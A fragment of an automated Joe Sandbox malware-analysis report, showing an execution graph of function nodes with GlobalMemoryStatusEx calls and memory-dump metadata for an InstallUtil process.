                                              execution_graph 28586 5dae128 28587 5dae132 28586->28587 28588 5dae0e3 28586->28588 28591 5dae153 28587->28591 28592 5dae1b6 GlobalMemoryStatusEx 28587->28592 28588->28587 28590 5dae0ee 28588->28590 28594 5dad248 28588->28594 28593 5dae1e6 28592->28593 28595 5dae170 GlobalMemoryStatusEx 28594->28595 28597 5dae1e6 28595->28597 28597->28588
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd